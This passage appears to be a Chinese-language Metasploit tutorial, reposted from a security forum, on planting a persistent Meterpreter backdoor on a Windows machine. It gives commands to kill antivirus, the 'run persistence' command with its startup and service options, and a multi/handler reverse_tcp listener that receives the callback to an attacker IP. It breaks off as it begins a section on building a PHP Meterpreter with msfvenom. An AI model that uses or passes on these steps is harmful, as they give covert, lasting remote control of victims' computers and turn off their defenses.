首发于先知社区:https://xz.aliyun.com/t/5951
Persistence后门
使用此方法建议运行前关闭杀毒软件
Run post/windows/manage/killav
输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130
创建一个持久性的后门。
详细信息如下:
-A 自动启动一个匹配的漏洞/多/处理程序来连接到代理
-L如果不使用%TEMP%,则选择目标主机中写入有效负载的>位置。
-P 有效载荷使用,默认是windows/meterpreter/reverse_tcp。
-S在启动时自动启动代理作为服务(具有系统特权)
-T 选择要使用的可执行模板
-U用户登录时自动启动代理
-X在系统启动时自动启动代理
-h这个帮助菜单
-i每次连接尝试之间的间隔(以秒为单位)
-p 运行Metasploit的系统正在监听的端口
-r 运行Metasploit的系统的IP监听连接返回
可以发现在目标机C:\Windows\TEMP下创建了一个QeVoiKqW.vbs文件
后使用以下命令设置监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.85.130
set lport 6666
run
即可看见已经建立了连接,
持久后门已经创建成功。
Meterpreter 后门
通过msfvenom工具制作PHP Meterpreter